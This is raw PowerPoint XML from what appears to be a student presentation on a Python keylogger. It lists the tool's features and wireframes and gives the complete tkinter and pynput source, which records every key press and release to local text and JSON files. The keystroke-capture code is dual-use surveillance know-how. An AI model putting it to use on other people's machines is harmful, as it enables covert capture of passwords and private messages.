            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Friendly Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: The application’s GUI makes it straightforward for users to interact with the keylogger, making the technical process of logging keystrokes approachable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>2. Dual Logging Mechanism Text and JSON: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Offering two formats for logging the key events increases the utility of the data captured. Users can quickly read through the text file or utilize the JSON file for deeper analysis, perhaps integrating with other data analysis tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>3. Real-Time Feedback Immediate Status Updates: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The GUI provides immediate feedback on the status of the keylogger, which is helpful for users to know whether the logging is active or not, enhancing trust and usability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>4. Simplicity and Clarity in Code Readable Code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The code is written in a clear and understandable manner, which makes it easy to follow and learn from. This is particularly valuable for beginners who are looking to understand the basics of GUI applications and event handling in Python.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722B-E525-E030-B4B2-92BEE3468FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="340023"/>
            <a:ext cx="10681335" cy="27699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IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Required libraries for implementing keylogger code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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58E2D12E-A127-FBB0-C752-CBC4BFD9503D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2942078353"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="1066800"/>
          <a:ext cx="8261033" cy="563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80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383ADD-B161-4F83-B8AB-DF91ED729B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="381000"/>
            <a:ext cx="3581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2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Code Implementation :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>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2F09EF-4AE3-8E26-B37E-05FE61AF00B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1112496"/>
            <a:ext cx="3429000" cy="5062924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>import json</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>keys_used = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        keys.write(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def on_press(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9F7AB2-ED2E-0448-49C5-CA99C57B950F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429432" y="990600"/>
            <a:ext cx="3505200" cy="5432256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>     if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def on_release(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    listener.start()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    stop_button.config(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581F3B3D-B9F8-14AD-EF56-974C56AFF68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7897761" y="1027471"/>
            <a:ext cx="2819400" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    stop_button.config(state='disabled’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>label.pack()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>root.mainloop()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Right 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E560C66A-3970-3542-AEED-874EB91731AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780503" y="2784431"/>
            <a:ext cx="60960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isometricOffAxis1Right"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="1">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="50000" endA="300" endPos="50000" dist="29997" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Arrow: Right 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D66AFF-CD86-C56F-BFB7-5BB2719790C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6845709" y="2784431"/>
            <a:ext cx="668594"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65E18CF-366C-A668-2A2F-97A3767BC414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2546761"/>
            <a:ext cx="762000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE7CD61-EE67-061C-11B2-871D449E677B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775654" y="2546761"/>
            <a:ext cx="808703" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310772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/2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1100" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D83C3"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>5</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454742" y="967597"/>
            <a:ext cx="2811780" cy="166712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-45" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Teams</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-15" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="10" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cam</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="10" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>wireframes</a:t>
            </a:r>
            <a:endParaRPr sz="10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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDDB3A80-F146-9FC2-63C8-467660AD0BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389551" y="212904"/>
            <a:ext cx="2630848"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IN" sz="4400" b="1" cap="none" spc="0" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Modelling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" cap="none" spc="0" dirty="0">
              <a:ln/>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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2415CE0-FFFB-73A0-C8E7-89B2BEFF760D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389551" y="1335004"/>
            <a:ext cx="10515600" cy="110799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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireframe Explanation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Initial State: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Guides the user to start the keylogger with a clear call-to-action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Starting State</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Provides real-time feedback about the keylogger’s activity, indicating that it is logging keystrokes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Stopped State</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Clearly informs the user that the keylogger has stopped and resets the interface for potential future use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Diagram 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FFB42E0-2F37-4674-77EE-2B5F9F42EACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="801143062"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="10896218" cy="4379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Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61F14F65-B3B0-088A-8C15-6DA5B5D59804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="304800"/>
            <a:ext cx="2245615" cy="92333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40" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" b="1" dirty="0">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent6">
